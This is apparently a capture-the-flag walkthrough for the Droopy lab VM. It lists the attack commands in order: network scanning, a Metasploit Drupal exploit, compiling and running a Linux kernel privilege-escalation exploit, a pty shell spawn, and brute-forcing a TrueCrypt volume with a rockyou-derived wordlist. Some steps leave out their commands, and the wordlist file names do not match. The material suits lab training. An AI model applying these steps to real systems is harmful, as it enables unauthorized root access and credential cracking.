In this post, You will learn how to CTF the Droopy this is a really very easy challenge stick till the end and I am sure you will be able to crack the box.
Have any doubt leave your question on the discord server.
To download droopy [Cllick here]
There is 1 flag in Droopy and we have to find it.
Hacking Phases in Droopy CTF
- Finding target IP
- Network Scanning (Nmap)
- Identifies Drupal CMS
- Exploiting Drupal CMs (Metasploit)
- Privilege Escalation with Kernel Exploit
- Uploading and Downloading dave.tc from /www/html
- Generate a Dictionary with the help of rockyou.txt
- Brute Force attack on Truecrypt Volume (Truecrack)
- Decrypting File (Veracrypt)
- Capture the Flag
Finding target IP
To find the target IP just enter arp-scan -l or enter netdiscover command.
Doing a full port scan and os and service scan.
nmap -p- -A 192.168.1.4
Found that port 80 is open and I just opened the web browser to view the target.
Identifies Drupal CMS
Head to the target website to have a look at it.
The website is powered by Drupal and there is an available exploit for drupal cms.
Exploiting Drupal CMs (Metasploit)
set rhost 192.168.1.4
Wait for the Meterpreter shell to open.
Privilege Escalation with Kernel Exploit
Open another terminal and type searchsploit 3.13.0
Copy this path to home directory /usr/share/exploitdb/exploits/Linux/local/37292.c
Once you saved it go back to Meterpreter shell and type.
Once the exploit is uploaded enter.
python -c ‘import pty;pty.spawn(“/bin/bash”)’
gcc 37292.c -o shell
chmod 777 shell
./shell to execute the exploit
cp dave.tc /var/www/html
Uploading and Downloading dave.tc from /www/html
Now open a web browser and enter the target IP and this URL.
Now save the file dave.tc
Generate a Dictionary with the help of rockyou.txt
Generating dictionary list to crack the dave.tc file and the flag is hidden inside dave.tc
cat rockyou.txt | grep academy > /root/Desktop/dict.txt
Brute Force attack on Truecrypt Volume (Truecrack)
To crack the password
truecrack –truecrypt /home/osboxes/Downloads/dave.tc -k SHA512 -w paas.tx
The password is etonacademy for dave.tc file
Decrypting File (Veracrypt)
To decrypt the file we are using veracrypt.
Once the file is decrypted. Open the file in a terminal.
Capture the Flag